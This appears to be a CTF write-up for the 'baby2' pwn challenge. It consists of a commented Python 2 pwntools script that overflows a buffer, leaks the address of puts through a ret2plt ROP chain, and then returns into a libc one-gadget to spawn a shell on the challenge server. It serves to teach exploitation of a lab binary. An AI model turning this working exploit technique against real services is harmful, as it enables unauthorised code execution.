Tags: rop 

Rating: 1.0

```python
from pwn import *

# CTF writeup script (Python 2 pwntools: string payloads, `print` statement,
# `.next()` on the search iterator). Two stages: (1) a ret2plt call to puts()
# that leaks the runtime address of puts from the GOT, (2) a second overflow
# that returns into a libc "one gadget". Stage 1 exists because libc is loaded
# at a randomised base (ASLR); the binary's own plt/got/main addresses are used
# as absolute values below, which implies a non-PIE target. The padding-only
# overwrite of the return address also implies no stack canary on this binary
# (inferred from the payload layout, not shown here).

#r = process('./baby2')
r = remote('baby-01.pwn.beer', 10002)
e = ELF('./baby2')       # the challenge binary (local copy, same build as remote)
libc = ELF('./libc.so.6')  # the libc the remote service is assumed to use

# Short aliases for the pwntools tube helpers used below.
ru = lambda a: r.recvuntil(a)
sl = lambda a: r.sendline(a)
sla = lambda a, b: r.sendlineafter(a, b)
ex = lambda : r.interactive()

puts_offset = libc.symbols['puts']   # offset of puts inside libc (base-relative)
puts_plt = e.plt['puts']             # binary's PLT stub for puts (absolute, non-PIE)
puts_got = e.got['puts']             # GOT slot holding the resolved puts address
main = e.symbols['main']             # return here after the leak so the bug can be hit again
pr = 0x0000000000400783 # pop rdi; ret  (gadget inside ./baby2, page-specific constant)
binsh_offset = libc.search('/bin/sh').next()  # unused below: one_gadget path is taken instead
system_offset = libc.symbols['system']        # unused below (see binsh_offset)
one_gadget = 0x4f2c5  # libc-relative offset of an execve("/bin/sh") gadget for ./libc.so.6;
                      # only valid for this exact libc build — TODO confirm against the file

# Stage 1: 0x18 bytes of filler up to the saved return address (presumably the
# distance from the buffer to RIP on this binary), then the chain
#   pop rdi; ret  ->  rdi = &GOT[puts]  ->  puts@plt  ->  main
# which prints the GOT entry (the real libc puts address) and restarts main.
p = ""
p += "\x90"*0x18
p += p64(pr)
p += p64(puts_got)
p += p64(puts_plt)
p += p64(main)
sl(p)

ru("input: ")
# puts() stops at the first NUL, so only the 6 significant bytes of the
# x86-64 address arrive; right-pad to 8 bytes before decoding as a u64.
leaked = u64(r.recv(6).ljust(8, '\x00'))
print hex(leaked)
libc_base = leaked - puts_offset     # rebase: runtime puts minus its static offset
one_shot = libc_base + one_gadget    # absolute address of the gadget in this process

# Stage 2: same filler, then return straight into the one gadget.
p = ""
p += "\x90"*0x18
p += p64(one_shot)
sla('input: ', p)
ex()
```